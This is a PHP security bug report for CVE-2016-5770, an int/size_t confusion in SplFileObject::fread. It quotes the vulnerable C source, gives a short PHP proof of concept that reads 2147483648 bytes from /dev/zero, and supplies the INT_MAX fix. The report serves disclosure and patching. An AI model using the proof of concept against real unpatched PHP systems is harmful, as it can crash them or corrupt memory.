: Sec Bug #72262 :: int/size_t confusion in SplFileObject::fread
| Sec Bug #72262 | int/size_t confusion in SplFileObject::fread | ||||
|---|---|---|---|---|---|
| Submitted: | 2016-05-25 09:44 UTC | Modified: | 2016-06-27 00:14 UTC | ||
| From: | taoguangchen at icloud dot com | Assigned: | stas (profile) | ||
| Status: | Closed | Package: | SPL related | ||
| PHP Version: | 5.5.35 | OS: | |||
| Private report: | No | CVE-ID: | 2016-5770 | ||
[2016-05-25 09:44 UTC] taoguangchen at icloud dot com
Description:
------------
int/size_t confusion in SplFileObject::fread
this bug similar with bug#72114
```
SPL_METHOD(SplFileObject, fread)
{
spl_filesystem_object *intern = (spl_filesystem_object*)zend_object_store_get_object(getThis() TSRMLS_CC);
long length = 0;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "l", &length) == FAILURE) {
return;
}
if (length <= 0) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Length parameter must be greater than 0");
RETURN_FALSE;
}
Z_STRVAL_P(return_value) = emalloc(length + 1);
Z_STRLEN_P(return_value) = php_stream_read(intern->u.file.stream, Z_STRVAL_P(return_value), length);
/* needed because recv/read/gzread doesnt put a null at the end*/
Z_STRVAL_P(return_value)[Z_STRLEN_P(return_value)] = 0;
Z_TYPE_P(return_value) = IS_STRING;
}
```
PoC:
```
<?php
ini_set('memory_limit', -1);
$filename = '/dev/zero';
$file = new SplFileObject($filename, 'r');
$file->fread(2147483648);
?>
```
Fix:
```
RETURN_FALSE;
}
+ if (length > INT_MAX) {
+ php_error_docref(NULL TSRMLS_CC, E_WARNING, "Length parameter must be no more than %d", INT_MAX);
+ RETURN_FALSE;
+ }
Z_STRVAL_P(return_value) = emalloc(length + 1);
```
Patches
Pull Requests
History
AllCommentsChangesGit/SVN commits
[2016-06-16 05:00 UTC] stas@php.net
-Assigned To: +Assigned To: stas
[2016-06-21 06:49 UTC] stas@php.net
-Status: Assigned +Status: Closed
[2016-06-25 02:13 UTC] seth dot arnold at canonical dot com
[2016-06-27 00:14 UTC] stas@php.net